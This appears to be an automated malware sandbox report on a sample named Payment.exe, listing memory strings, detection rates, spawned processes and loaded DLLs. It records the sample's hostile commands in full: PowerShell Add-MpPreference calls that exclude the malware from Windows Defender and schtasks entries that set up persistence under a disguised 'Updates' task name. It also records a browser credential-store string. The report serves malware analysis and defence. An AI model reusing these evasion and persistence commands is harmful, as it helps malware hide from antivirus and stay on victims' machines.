                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE pending_requests SET request_status = :requestStatus, message = :message, status_code = :statusCode WHERE( pending_request_id = :pendingRequestId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT * FROM device_mappings WHERE( content_item_id = :contentItemId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT OR REPLACE INTO branches ( content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, branch_name) SELECT content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, :targetBranchname from branches WHERE branch_name = :srcBranchname AND content_item_id = :contentItemId AND app_id = :appId;
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT branches.content_item_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) JOIN content_items ON( content_items.creation_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch1 AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id NOT IN ( SELECT branches.content_item_revision_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch2))));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_relations ( src_content_item_id TEXT NOT NULL, target_content_item_id TEXT NOT NULL, rel TEXT NOT NULL, PRIMARY KEY (src_content_item_id, target_content_item_id, rel));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO pending_requests( pending_request_id, request_type, content_item_id, context) VALUES( :pendingRequestId, :requestType, :contentItemId, :context);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT *, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = creation_id_local AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload, (SELECT 1 from branches where branch_name = 'conflict' AND content_item_id = creation_id_local) as is_conflicted, ( SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id and branches.content_item_id = creation_id_local) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base'))))) as is_sync_pending FROM ( SELECT content_item_relations.src_content_item_id, branches.download_state, branches.record_created, branches.modified, content_items.creation_id , content_items.creation_id as creation_id_local, branches.content_item_id, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE content_item_revisions SET local_etag = :localEtag, request_id = :requestId, updated = :updated WHERE( content_item_revision_id IN ( SELECT content_item_revision_id FROM branches WHERE( content_item_id = :contentItemId AND branch_name = :branchName ANDapp_id = :appId)));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType and content_item_id = :contentItemId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE device_mappings SET unPinned = 1 WHERE(content_item_id = :contentItemId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS pending_requests ( pending_request_id TEXT PRIMARY KEY NOT NULL, request_type TEXT NOT NULL, content_item_id TEXT DEFAULT NULL, context TEXT DEFAULT NULL, pending_request_created TIMESTAMP DEFAULT (strftime('%Y-%m-%dT%H:%M:%SZ', 'now', 'localtime')) NOT NULL, request_status TEXT DEFAULT "CREATED" NOT NULL, message TEXT DEFAULT NULL, status_code INTEGER DEFAULT -1 NOT NULL, device_mapping_id TEXT DEFAULT NULL, UNIQUE (content_item_id, request_type, request_status));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :assetId AND branches.branch_name = :branchName AND branches.app_id = :appId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT content_items.creation_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'current' AND branches.app_id = :appid) AND ((content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR (content_item_revisions.content_item_revision_id) NOT IN ( SELECT content_item_revisions.content_item_revision_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'base' AND branches.app_id = :appid))) AND content_items.creation_id NOT IN ( SELECT content_item_id FROM branches WHERE( branch_name = 'error'));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT creation_id FROM content_items WHERE asset_id = :assetId;
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT * FROM device_mappings WHERE( unPinned = 1);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted, (SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :collectionId AND branches.branch_name = :branchName AND branches.app_id = :appId)) as collection_cloud_etag FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN content_item_rel
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT * FROM device_mappings WHERE( content_item_type = :resourceType);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_updates ( seq_num INTEGER PRIMARY KEY NOT NULL, app_id TEXT NOT NULL, content_item_local_id TEXT NOT NULL, time TIMESTAMP NOT NULL, operation TEXT NOT NULL);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE content_items SET asset_id = :assetId WHERE( creation_id = :creationId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS device_mappings ( device_mapping_id TEXT PRIMARY KEY NOT NULL, content_item_id TEXT NOT NULL, content_item_type TEXT NOT NULL, include_rel_types TEXT DEFAULT NULL, include_depth INTEGER DEFAULT 0 NOT NULL, branch TEXT DEFAULT NULL, device_mapping_created TIMESTAMP DEFAULT (strftime('%s', 'now')) NOT NULL, collection_id TEXT DEFAULT NULL, TTL INTEGER DEFAULT 0 NOT NULL, Priority INTEGER DEFAULT 0 NOT NULL, app_info TEXT NOT NULL, unPinned INTEGER DEFAULT 0 NOT NULL, UNIQUE (content_item_id, branch));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests;
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO resource_content( resource_content_id, resource_content) VALUES ( :resourceContentId, :resourceContent);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT *FROM pending_requests WHERE(content_item_id = :contentItemId);
                  Source: Payment.exe, 00000008.00000002.2150772680.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003F85000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003FAA000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003F76000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Payment.exeVirustotal: Detection: 41%
                  Source: Payment.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\Desktop\Payment.exeFile read: C:\Users\user\Desktop\Payment.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe C:\Users\user\AppData\Roaming\jwBqGZseW.exe
                  Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                  Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                  Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp"
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: secur32.dllJump to behavior
